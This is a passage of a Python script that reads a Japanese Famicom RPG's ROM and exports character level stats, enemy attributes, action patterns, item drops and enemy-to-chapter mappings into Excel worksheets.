0\n player_character_levels = []\n for level in range(1, max_level + 1):\n status_offset = status_start_prg_rom_address + (level - 1) * status_unit_byte_size\n (hp, cp, attack, defense, speed, ten, shin, atama) = struct.unpack_from(\" _EnemyGroupPatternList:\n prg_rom_address = 0x00F704\n list_id = 0\n while list_id < enemy_group_pattern_list_id:\n if prg_rom_bytes[prg_rom_address] == 0xFF:\n list_id += 1\n prg_rom_address += 1\n enemy_group_pattern_ids = []\n while prg_rom_bytes[prg_rom_address] != 0xFF:\n enemy_group_pattern_ids.append(prg_rom_bytes[prg_rom_address])\n prg_rom_address += 1\n return _EnemyGroupPatternList(enemy_group_pattern_ids=tuple(enemy_group_pattern_ids))\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyGroupPattern:\n enemy_group_size: int\n enemy_group_0_size: int\n enemy_group_0_enemy_id: Optional[int]\n enemy_group_1_size: int\n enemy_group_1_enemy_id: Optional[int]\n enemy_group_2_size: int\n enemy_group_2_enemy_id: Optional[int]\n\n\ndef _get_enemy_group_pattern(prg_rom_bytes: bytes, enemy_group_pattern_id: int) -> _EnemyGroupPattern:\n assert 0 < enemy_group_pattern_id\n prg_rom_address = 0x00FA48\n pattern_id = 0\n while pattern_id < 
enemy_group_pattern_id:\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n if enemy_group_0_size != 0:\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n if enemy_group_1_size != 0:\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n if enemy_group_2_size != 0:\n prg_rom_address += 1\n pattern_id += 1\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n enemy_group_size = 0\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n enemy_group_0_enemy_id = None\n if enemy_group_0_size != 0:\n enemy_group_0_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n enemy_group_1_enemy_id = None\n if enemy_group_1_size != 0:\n enemy_group_1_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n enemy_group_2_enemy_id = None\n if enemy_group_2_size != 0:\n enemy_group_2_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n return _EnemyGroupPattern(\n enemy_group_size=enemy_group_size,\n enemy_group_0_size=enemy_group_0_size,\n enemy_group_0_enemy_id=enemy_group_0_enemy_id,\n enemy_group_1_size=enemy_group_1_size,\n enemy_group_1_enemy_id=enemy_group_1_enemy_id,\n enemy_group_2_size=enemy_group_2_size,\n enemy_group_2_enemy_id=enemy_group_2_enemy_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionId:\n action_ids: Sequence[int]\n\n\ndef _get_enemy_action_id(prg_rom_bytes: bytes, raw_action_id: int) -> _EnemyActionId:\n assert 1 <= raw_action_id\n start_prg_rom_address = 0x00FF93 + (raw_action_id - 1)\n action_id = prg_rom_bytes[start_prg_rom_address]\n if action_id < 0x80:\n return _EnemyActionId(action_ids=tuple([action_id]))\n action_id = (action_id << 1) & 0xFF\n return _EnemyActionId(\n action_ids=tuple(\n [\n prg_rom_bytes[0x00FFEE + action_id],\n prg_rom_bytes[0x00FFEE + action_id + 1],\n ]\n )\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionPattern:\n raw_action_id_0: int\n raw_action_id_1: int\n raw_action_id_2: int\n raw_action_id_3: int\n action_id_0: _EnemyActionId\n action_id_1: _EnemyActionId\n action_id_2: _EnemyActionId\n action_id_3: _EnemyActionId\n action_threshold_0: int\n action_threshold_1: int\n action_threshold_2: int\n action_threshold_3: int\n\n\ndef _get_enemy_action_pattern(prg_rom_bytes: bytes, enemy_action_pattern_id: int) -> _EnemyActionPattern:\n assert enemy_action_pattern_id <= 0x3F\n enemy_action_pattern_unit_byte_size = 8\n start_prg_rom_address = 0x00F442 + enemy_action_pattern_id * enemy_action_pattern_unit_byte_size\n enemy_action_pattern = _EnemyActionPattern(\n raw_action_id_0=prg_rom_bytes[start_prg_rom_address],\n raw_action_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n raw_action_id_2=prg_rom_bytes[start_prg_rom_address + 2],\n raw_action_id_3=prg_rom_bytes[start_prg_rom_address + 3],\n action_id_0=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address]),\n action_id_1=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 1]),\n action_id_2=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 2]),\n action_id_3=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 3]),\n action_threshold_0=prg_rom_bytes[start_prg_rom_address + 
4],\n action_threshold_1=prg_rom_bytes[start_prg_rom_address + 5],\n action_threshold_2=prg_rom_bytes[start_prg_rom_address + 6],\n action_threshold_3=prg_rom_bytes[start_prg_rom_address + 7],\n )\n # Validate that the sum of the thresholds should be around 0xFF.\n assert 0xFA <= (enemy_action_pattern.action_threshold_0 + enemy_action_pattern.action_threshold_1 + enemy_action_pattern.action_threshold_2 + enemy_action_pattern.action_threshold_3) <= 0x100\n return enemy_action_pattern\n\n\ndef _aggregate_enemy_action_pattern(enemy_action_pattern: _EnemyActionPattern) -> Dict[int, int]:\n action_threshold_0 = enemy_action_pattern.action_threshold_0\n action_threshold_1 = enemy_action_pattern.action_threshold_1\n action_threshold_2 = enemy_action_pattern.action_threshold_2\n action_threshold_3 = 0x100 - (action_threshold_0 + action_threshold_1 + action_threshold_2)\n assert 0x00 <= action_threshold_3\n threshold_by_action_id: Dict[int, int] = collections.defaultdict(int)\n for action_id in enemy_action_pattern.action_id_0.action_ids:\n threshold_by_action_id[action_id] += action_threshold_0 * 2 // len(enemy_action_pattern.action_id_0.action_ids)\n for action_id in enemy_action_pattern.action_id_1.action_ids:\n threshold_by_action_id[action_id] += action_threshold_1 * 2 // len(enemy_action_pattern.action_id_1.action_ids)\n for action_id in enemy_action_pattern.action_id_2.action_ids:\n threshold_by_action_id[action_id] += action_threshold_2 * 2 // len(enemy_action_pattern.action_id_2.action_ids)\n for action_id in enemy_action_pattern.action_id_3.action_ids:\n threshold_by_action_id[action_id] += action_threshold_3 * 2 // len(enemy_action_pattern.action_id_3.action_ids)\n assert sum(threshold_by_action_id.values()) == 0x100 * 2, sum(threshold_by_action_id.values())\n return threshold_by_action_id\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ActionName:\n action_name_bytes: bytes\n action_name: str\n\n\ndef _get_action_name(prg_rom_bytes: bytes, action_id: int) -> _ActionName:\n if action_id == 0xEE:\n return _ActionName(\n action_name_bytes=b\"\",\n action_name=\"こうげき  \",\n )\n action_name_unit_byte_size = 8\n start_prg_rom_address = 0x02634D + action_id * action_name_unit_byte_size\n action_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + action_name_unit_byte_size - 1]\n return _ActionName(\n action_name_bytes=action_name_bytes,\n action_name=_decode_string(action_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemDropPattern:\n drop_item_id_0: int\n drop_item_id_1: int\n item_drop_threshold: int\n\n\ndef _get_item_drop_pattern(prg_rom_bytes: bytes, item_drop_pattern_id: int) -> _ItemDropPattern:\n assert item_drop_pattern_id <= 0x3F\n item_drop_pattern_unit_byte_size = 3\n start_prg_rom_address = 0xF643 + item_drop_pattern_id * item_drop_pattern_unit_byte_size\n return _ItemDropPattern(\n drop_item_id_0=prg_rom_bytes[start_prg_rom_address],\n drop_item_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n item_drop_threshold=prg_rom_bytes[start_prg_rom_address + 2],\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemName:\n item_name_bytes: bytes\n item_name: str\n\n\ndef _get_item_name(prg_rom_bytes: bytes, item_id: int) -> _ItemName:\n assert 0x00 < item_id\n item_name_unit_byte_size = 8\n start_prg_rom_address = 0x026685 + item_id * item_name_unit_byte_size\n item_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + item_name_unit_byte_size - 1]\n return _ItemName(\n item_name_bytes=item_name_bytes,\n 
item_name=_decode_string(item_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyName:\n enemy_name_bytes: bytes\n enemy_name: str\n\n\ndef _get_enemy_name(prg_rom_bytes: bytes, enemy_id: int) -> _EnemyName:\n assert 0x00 < enemy_id\n enemy_name_unit_byte_size = 8\n start_prg_rom_address = 0x25AD5 + enemy_id * enemy_name_unit_byte_size\n enemy_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + enemy_name_unit_byte_size - 1]\n return _EnemyName(\n enemy_name_bytes=enemy_name_bytes,\n enemy_name=_decode_string(enemy_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Enemy:\n hp: int\n min_hp: int\n max_hp: int\n cp: int\n attack: int\n defense: int\n speed: int\n money: int\n experience: int\n escapable: bool\n attack_twice: bool\n hittability: int\n mihagito_endurance: bool\n kurusu_endurance: bool\n beto_endurance: bool\n choriki_endurance_1: int\n choriki_endurance_2: int\n choriki_endurance_3_4: int\n choriki_endurance_5: int\n choriki_endurance_6: int\n mahuuji_endurance: int\n mahuuji_effectiveness: int\n lullaby_endurance: int\n lullaby_effectiveness: int\n parapa_endurance: int\n parapa_effectiveness: int\n action_pattern_id: int\n item_drop_pattern_id: int\n\n\ndef _decode_enemy_value(enemy_data: Dict[int, int], y: int) -> int:\n assert 0 <= y\n value = ((enemy_data[0x6000] >> y) * 0x100 + enemy_data[0x6001 + y]) & 0x1FF\n bit_count = 0\n for i in range(5):\n ends_with_one = value & 0x01 != 0\n if ends_with_one:\n bit_count += 1\n value = (value >> 1) & 0xFF\n if not ends_with_one:\n break\n if bit_count == 0:\n return value\n elif bit_count <= 3:\n return (value + 1) * (10**bit_count)\n elif bit_count == 4:\n v = (value + 1) * 1000\n if (v & 0x6000) != 0:\n return 0xFFFF\n else:\n # エイりアンドー\n return 0x9C50\n raise ValueError(\"Invalid enemy_data.\")\n\n\ndef _calculate_enemy_hp_range(hp: int) -> Tuple[int, int]:\n diff = min(hp // 8, 0xFF)\n return (hp - diff, hp + diff)\n\n\ndef _get_enemy(prg_rom_bytes: bytes, enemy_id: int) -> _Enemy:\n assert 0 < enemy_id\n enemy_status_unit_byte_size = 0x14\n enemy_status_start_prg_rom_address = 0x00E1C2 + (enemy_id - 1) * enemy_status_unit_byte_size\n enemy_data: Dict[int, int] = {}\n for i in range(enemy_status_unit_byte_size):\n enemy_data[0x6000 + i] = prg_rom_bytes[enemy_status_start_prg_rom_address + i]\n experience = _decode_enemy_value(enemy_data, 0)\n hp = _decode_enemy_value(enemy_data, 1)\n (min_hp, max_hp) = _calculate_enemy_hp_range(hp)\n attack = _decode_enemy_value(enemy_data, 2)\n defense = _decode_enemy_value(enemy_data, 3)\n cp = _decode_enemy_value(enemy_data, 4)\n speed = _decode_enemy_value(enemy_data, 5)\n money = _decode_enemy_value(enemy_data, 6)\n escapable = (enemy_data[0x6008] & 0x04) == 0\n attack_twice = (enemy_data[0x6008] & 0x30) in (0x10, 0x20)\n hittability = (enemy_data[0x6008] & 0xC0) >> 6\n mihagito_endurance = (enemy_data[0x6008] & 0x08) != 0\n kurusu_endurance = not escapable\n beto_endurance = (enemy_data[0x6008] & 0x02) != 0\n # #$C0:属性2(火炎系)\n choriki_endurance_2 = (enemy_data[0x6009] & 0xC0) >> 6\n # #$C0:属性5(電撃系), #$30:属性3-4(水撃系・氷結系), #$0C:属性1(地震系), #$03:属性6(爆発系)\n choriki_endurance_5 = (enemy_data[0x600A] & 0xC0) >> 6\n choriki_endurance_3_4 = (enemy_data[0x600A] & 0x30) >> 4\n choriki_endurance_1 = (enemy_data[0x600A] & 0x0C) >> 2\n choriki_endurance_6 = enemy_data[0x600A] & 0x03\n mahuuji_endurance = (enemy_data[0x600B] & 0xC0) >> 6\n mahuuji_effectiveness = (enemy_data[0x600B] & 0x30) >> 4\n lullaby_endurance = (enemy_data[0x600B] & 0x0C) 
>> 2\n lullaby_effectiveness = enemy_data[0x600B] & 0x03\n parapa_endurance = (enemy_data[0x600C] & 0x0C) >> 2\n parapa_effectiveness = enemy_data[0x600C] & 0x03\n action_pattern_id = enemy_data[0x6009] & 0x3F\n item_drop_pattern_id = enemy_data[0x600D] & 0x3F\n return _Enemy(\n hp=hp,\n min_hp=min_hp,\n max_hp=max_hp,\n cp=cp,\n attack=attack,\n defense=defense,\n speed=speed,\n experience=experience,\n money=money,\n escapable=escapable,\n attack_twice=attack_twice,\n hittability=hittability,\n mihagito_endurance=mihagito_endurance,\n kurusu_endurance=kurusu_endurance,\n beto_endurance=beto_endurance,\n choriki_endurance_1=choriki_endurance_1,\n choriki_endurance_2=choriki_endurance_2,\n choriki_endurance_3_4=choriki_endurance_3_4,\n choriki_endurance_5=choriki_endurance_5,\n choriki_endurance_6=choriki_endurance_6,\n mahuuji_endurance=mahuuji_endurance,\n mahuuji_effectiveness=mahuuji_effectiveness,\n lullaby_endurance=lullaby_endurance,\n lullaby_effectiveness=lullaby_effectiveness,\n parapa_endurance=parapa_endurance,\n parapa_effectiveness=parapa_effectiveness,\n action_pattern_id=action_pattern_id,\n item_drop_pattern_id=item_drop_pattern_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Map:\n enemy_group_pattern_list_id: int\n encounter_threshold_id: int\n\n\ndef _get_map(prg_rom_bytes: bytes, map_id: int) -> _Map:\n map_unit_byte_size = 12\n start_prg_rom_address = 0x8004 + map_id * map_unit_byte_size\n v008F = prg_rom_bytes[start_prg_rom_address + 1]\n if v008F == 0x01:\n enemy_group_pattern_list_id = 0x78\n elif v008F == 0x02:\n enemy_group_pattern_list_id = 0x00\n else:\n v0091 = prg_rom_bytes[start_prg_rom_address + 3]\n enemy_group_pattern_list_id = v0091\n if enemy_group_pattern_list_id >= 0x9B:\n enemy_group_pattern_list_id = 0x01\n v0098 = prg_rom_bytes[start_prg_rom_address + 10]\n encounter_threshold_id = v0098 >> 5\n return _Map(enemy_group_pattern_list_id=enemy_group_pattern_list_id, encounter_threshold_id=encounter_threshold_id)\n\n\n_LEFT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"left\", vertical=\"top\")\n_RIGHT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"right\", vertical=\"top\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ColumnStyle:\n caption: str\n cell_alignment: openpyxl.styles.Alignment = _LEFT_ALIGNMENT\n\n\ndef _fill_worksheet_header_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle]) -> None:\n for column_index, header in enumerate(header_row, 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = header.caption\n\n\ndef _fill_worksheet_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle], row: List[Any]) -> None:\n for column_index, (header_column, column) in enumerate(zip(header_row, row), 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = column\n cell.alignment = header_column.cell_alignment\n\n\ndef _fill_player_character(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"キャラクター名\"),\n _ColumnStyle(caption=\"最大レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"守備\", cell_alignment=_RIGHT_ALIGNMENT),\n 
_ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"天の守り\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"芯の強さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"頭の良さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"前レベルからの必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"累積必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for player_character_type in _PlayerCharacterType:\n player_character = _get_player_character(prg_rom_bytes, player_character_type)\n for level in player_character.levels:\n row = [\n player_character.player_character_type.value,\n player_character.max_level,\n level.level,\n level.hp,\n level.cp,\n level.attack,\n level.defense,\n level.speed,\n level.ten,\n level.shin,\n level.atama,\n level.experience_required_from_previous_level,\n level.accumulated_experience_required,\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_chapter_name_of_enemy(enemy_id: int) -> str:\n # NOTE: This list may be incorrect.\n return {\n 0x01: \"ボス\", # ウシまつ\n 0x02: \"ボス\", # おおなまず\n 0x04: \"1の巻\", # どくまんじゅう\n 0x05: \"1の巻\", # レッドスネーク\n 0x06: \"1の巻\", # しろぼうず\n 0x07: \"1の巻\", # カマおとこ\n 0x08: \"ボス\", # まむしおとこ\n 0x09: \"1の巻\", # フライングバム\n 0x0A: \"1の巻\", # スカルバット\n 0x0B: \"1の巻\", # ダイキチ\n 0x0C: \"1の巻\", # へルラッツ\n 0x0D: \"1の巻\", # アッカンべー\n 0x0E: \"1の巻\", # へらへら\n 0x0F: \"1の巻\", # クモジン\n 0x10: \"1の巻\", # からくりマン\n 0x11: \"1の巻\", # ブラックマン\n 0x12: \"1の巻\", # かげにん\n 0x13: \"1の巻\", # にんけん\n 0x14: \"ボス\", # デビルクローン\n 0x15: \"2の巻\", # べムガー\n 0x16: \"2の巻\", # デスグりーン\n 0x17: \"2の巻\", # へルモンキー\n 0x18: \"2の巻\", # シェルビー\n 0x19: \"2の巻\", # へびおんな\n 0x1A: \"2の巻\", # ドラゴンマン\n 0x1B: \"2の巻\", # ぎょろん\n 0x1C: \"2の巻\", # メカタツノコ\n 0x1D: \"ボス\", # タツノコつかい\n 0x1E: \"ボス\", # うつぼうず\n 0x1F: \"3の巻\", # おおとげむし\n 0x20: \"3の巻\", # マグマンゼりー\n 0x21: \"3の巻\", # ひふきガメ\n 0x22: \"3の巻\", # べロべロべー\n 0x23: \"3の巻\", # ヒダシメ\n 0x24: \"3の巻\", # バットクルス\n 0x25: \"3の巻\", # かえんマン\n 0x26: \"3の巻\", # いんねび\n 0x27: \"ボス\", # かえんだいおう\n 0x28: \"4の巻\", # マッドボアー\n 0x29: \"4の巻\", # ひゃっかんいぬ\n 0x2A: \"4の巻\", # ウルフマン\n 0x2B: \"4の巻\", # りトルエイプ\n 0x2C: \"4の巻\", # しろやまた\n 0x2D: \"4の巻\", # へルバット\n 0x2E: \"4の巻\", # くらやみマン\n 0x2F: \"4の巻\", # シャドウマン\n 0x30: \"ボス\", # ムササビだゆう\n 0x31: \"5の巻\", # あまのじゃく\n 0x32: \"5の巻\", # クレイジーカウ\n 0x33: \"5の巻\", # レッドソーサー\n 0x34: \"5の巻\", # しにがみこぞう\n 0x35: \"5の巻\", # にんげんもどき\n 0x36: \"5の巻\", # バトルナイト\n 0x37: \"ボス\", # コウモりだゆう\n 0x38: \"6の巻\", # ララバイかめん\n 0x39: \"6の巻\", # スーパークロン\n 0x3A: \"6の巻\", # シャーぺイン\n 0x3B: \"6の巻\", # サソラム\n 0x3C: \"6の巻\", # コカーメン\n 0x3D: \"6の巻\", # カーメン\n 0x3E: \"6の巻\", # きがマン\n 0x3F: \"ボス\", # ビッグカンカン\n 0x40: \"6の巻\", # マッドミイラ\n 0x41: \"6の巻\", # ファラー\n 0x42: \"6の巻\", # スフインツク\n 0x43: \"ボス\", # ツタンだいおう\n 0x44: \"7の巻\", # パニュロン\n 0x45: \"7の巻\", # ガオウ\n 0x46: \"7の巻\", # アイスマン\n 0x47: \"7の巻\", # ひょうがんだん\n 0x48: \"7の巻\", # ガンテツゾンビ\n 0x49: \"7の巻\", # ゆきひめ\n 0x4A: \"7の巻\", # ダークへッド\n 0x4B: \"7の巻\", # ひょうけつマン\n 0x4C: \"7の巻\", # ひょうがコング\n 0x4D: \"ボス\", # だるまだいし\n 0x4E: \"8の巻\", # へルファイヤー\n 0x4F: \"8の巻\", # どろたぼう\n 0x50: \"8の巻\", # ゾンビー\n 0x51: \"8の巻\", # のろいひめ\n 0x52: \"8の巻\", # ゾンビコウモり\n 0x53: \"8の巻\", # メタルパラソル\n 0x54: \"8の巻\", # あしがるゾンビ\n 0x55: \"8の巻\", # のろいマン\n 0x56: \"8の巻\", # スカルホッパー\n 0x57: \"8の巻\", # ミステりーアイ\n 0x58: \"ボス\", # ゾンビまおう\n 0x59: \"8の巻\", # かねくいだま\n 0x5A: \"8の巻\", # ラーゴン\n 0x5B: \"8の巻\", # モスカルラ\n 0x5C: \"8の巻\", # ダンダン\n 0x5D: \"8の巻\", # キンゾー\n 0x5E: \"8の巻\", # 
ガキゾンビ\n 0x5F: \"8の巻\", # ブレインソーサ\n 0x60: \"ボス\", # ロボゴールド\n 0x61: \"1の巻\", # キノコング\n 0x63: \"9の巻\", # あかぼうず\n 0x64: \"9の巻\", # ダークネス\n 0x65: \"9の巻\", # まぼろしかめん\n 0x66: \"9の巻\", # ろくろ\n 0x67: \"9の巻\", # まそうりょ\n 0x68: \"9の巻\", # はんにゃ\n 0x69: \"9の巻\", # ドラゴルド\n 0x6A: \"ボス\", # バイオフラワー\n 0x6B: \"9の巻\", # マンイーター\n 0x6C: \"9の巻\", # フラワー\n 0x6D: \"10の巻\", # みらいマン\n 0x6E: \"10の巻\", # ジョックー\n 0x6F: \"10の巻\", # ミンミン\n 0x70: \"10の巻\", # アイアンアイ\n 0x71: \"10の巻\", # ガンダーロボ\n 0x72: \"10の巻\", # レイザータンク\n 0x73: \"ボス\", # ボスガンダー1\n 0x74: \"ボス\", # ボスガンダー2\n 0x75: \"10の巻\", # メガべルガー\n 0x76: \"10の巻\", # レガルゴ\n 0x77: \"10の巻\", # スカイキラー\n 0x78: \"ボス\", # エイりアンドー\n 0x79: \"ボス\", # キラーウルフ\n 0x7A: \"ボス\", # メタルブロック\n 0x7B: \"ボス\", # フライウイドウ\n 0x7C: \"ボス\", # サーべンラガー\n 0x7D: \"ボス\", # マインマスター\n 0x7E: \"オニガランド\", # クレイジーババ\n 0x7F: \"オニガランド\", # まへいもち\n 0x80: \"オニガランド\", # ドグウアーマー\n 0x81: \"オニガランド\", # へビオトコ\n 0x82: \"ボス\", # イヌゾンビ\n 0x83: \"オニガランド\", # あおぼうず\n 0x84: \"オニガランド\", # オニデーモン\n 0x85: \"オニガランド\", # マグマン\n 0x86: \"オニガランド\", # モンスタージジ\n 0x87: \"オニガランド\", # あおきし\n 0x88: \"オニガランド\", # オニタコン\n 0x89: \"ボス\", # サルボス\n 0x8A: \"オニガランド\", # シーサーぺント\n 0x8B: \"オニガランド\", # ブルーアンクル\n 0x8C: \"オニガランド\", # スネークポッド\n 0x8D: \"オニガランド\", # レッドドッグ\n 0x8E: \"オニガランド\", # ブルードッグ\n 0x8F: \"オニガランド\", # バンコパ\n 0x90: \"オニガランド\", # ピーチボーイズ\n 0x91: \"ボス\", # モモタロゾンビ\n 0x92: \"ボス\", # キラーウルフ\n 0x93: \"オーロラ王国\", # グりーンアイ\n 0x94: \"オーロラ王国\", # つるりん\n 0x95: \"オーロラ王国\", # へビーガル\n 0x96: \"オーロラ王国\", # スカイマン\n 0x97: \"オーロラ王国\", # クレバス\n 0x98: \"オーロラ王国\", # グりーンケルプ\n 0x99: \"オーロラ王国\", # イノクラッシュ\n 0x9A: \"オーロラ王国\", # アイスファイヤ\n 0x9B: \"オーロラ王国\", # べムカッター\n 0x9C: \"オーロラ王国\", # がいこつむし\n 0x9D: \"オーロラ王国\", # シャドーマスク\n 0x9E: \"オーロラ王国\", # カニモンス\n 0x9F: \"オーロラ王国\", # アイスストーン\n 0xA0: \"オーロラ王国\", # ゆきみアイス\n 0xA1: \"オーロラ王国\", # ブルーザウルス\n 0xA2: \"オーロラ王国\", # じんめんいわ\n 0xA3: \"オーロラ王国\", # エレキラドン\n 0xA4: \"オーロラ王国\", # ブビ\n 0xA5: \"オーロラ王国\", # キルスライダー\n 0xA6: \"ボス\", # メタルブロック\n 0xA9: \"2の巻\", # しきゃくマン\n 0xAA: \"ボス\", # キンタロゾンビ\n 0xAC: \"ボス\", # ウシまつ\n }.get(enemy_id, \"不明\")\n\n\ndef _fill_enemy(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵ID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵名前\"),\n _ColumnStyle(caption=\"初出\"),\n _ColumnStyle(caption=\"基礎命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最小命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"防御\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"獲得金\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"逃走\"),\n _ColumnStyle(caption=\"行動回数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"回避補正\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ミハギトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"クルスきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ベトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"地震系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"火炎系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"水撃系・氷結系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"電撃系超力きく率\", 
cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"爆発系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}\"))\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}_確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム1\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム2\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"備考\"))\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"C2\"\n choriki_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n debuff_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n tern_bucket = {\n 0: \"2 or 3\",\n 1: \"4 or 5\",\n 2: \"5 or 6\",\n }\n escapable = {\n True: \"可能\",\n False: \"不可\",\n }\n attack_twice = {\n True: \"1 or 2\",\n False: \"1\",\n }\n hittability = {\n 0: 0xC0,\n 1: 0xA0,\n 2: 0x80,\n 3: 0,\n }\n mihagito_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n kurusu_endurance = {\n True: \"0%\",\n False: \"20%\",\n }\n beto_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n note_by_enemy_id = {\n 0x78: \"プレイヤーの行動選択後のターン開始時に命の上位バイトが#$7Fに上書きされる。(ターン開始時に命が32513(#$7F01)以上に回復する)\", # エイりアンドー\n }\n rows = []\n for enemy_id in range(1, _ENEMY_ID_COUNT + 1):\n enemy = _get_enemy(prg_rom_bytes, enemy_id)\n enemy_name = _get_enemy_name(prg_rom_bytes, enemy_id)\n mahuuji_endurance = debuff_endurance[enemy.mahuuji_endurance]\n if enemy.mahuuji_endurance == 